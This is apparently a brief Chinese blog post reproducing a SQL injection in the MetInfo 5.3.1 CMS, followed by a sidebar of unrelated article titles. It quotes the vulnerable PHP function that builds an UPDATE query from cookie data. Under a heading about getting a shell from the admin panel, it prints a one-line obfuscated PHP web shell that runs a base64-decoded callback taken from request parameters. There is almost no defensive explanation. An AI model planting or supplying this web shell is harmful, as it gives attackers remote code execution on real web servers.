metlnfo 5.3.1 sql注入复现
2024-10-19 11:58:58
首先还是要说的是metlnfo是伪全局变量机制
所以如下:
/admin/include/global.func.php
function save_met_cookie(){
global $met_cookie,$db,$met_admin_table;
$met_cookie['time']=time();
$json=json_encode($met_cookie);
$username=$met_cookie[metinfo_admin_id]?$met_cookie[metinfo_admin_id]:$met_cookie[metinfo_member_id];
$username=daddslashes($username,0,1);
$query="update $met_admin_table set cookie='$json' where id='$username'";
$user=$db->query($query);
}
后台拿shell
<?php $e = $_REQUEST['e']; $arr = array($_REQUEST['pass'],); array_filter($arr, base64_decode($e)); ?>
最新文章
- 使用WCF传输DataTable:DataTable和Xml格式的字符串相互转换(C#)
- MVVM
- 介绍开源的.net通信框架NetworkComms框架 源码分析(十五 ) CommsThreadPool自定义线程池
- [推荐]PaaS技术知识贴
- Android之TextView文字绘制流程
- [saiku] 优化多维度查询效率
- java开发规范
- Highcharts下载与使用_数据报表图
- 读取Excel文件内容在Web上显示
- Windows 2012 AD配置
- rem单位
- C#变量、常量、枚举、预处理器指令知多少
- c++ -->; static关键字总结
- vim配置(使用Vundle)
- swiper插件遇上tab切换
- 【译】Focused and Diffuse Modes(专注与发散模式)
- BZOJ2829信用卡凸包——凸包
- edit 控件之隐藏光标
- (9)模板层 - templates(模板语言、语法、取值、过滤器、变量的使用)
- Gson转换json数据为对象
热门文章
- 什么情况下需要检测预装Win8/8.1电脑内置激活密钥(即Win8/8.1 OEM key)?
- java read读取方法 之 指定读取大小,根据返回值判断是否读取所有的内容 -1表示读取完毕
- 【bzoj4922】[Lydsy六月月赛]Karp-de-Chant Number 贪心+背包dp
- Java线程常用方法详解
- bzoj 3280: 小R的烦恼 (网络流)
- [CTSC2014]企鹅QQ hash
- Android 常用控件自定义样式RadioButton、CheckBox、ProgressBar、
- BZOJ1297:[SCOI2009]迷路——题解
- BZOJ1588:[HNOI2002]营业额统计——题解
- C++中数组和vector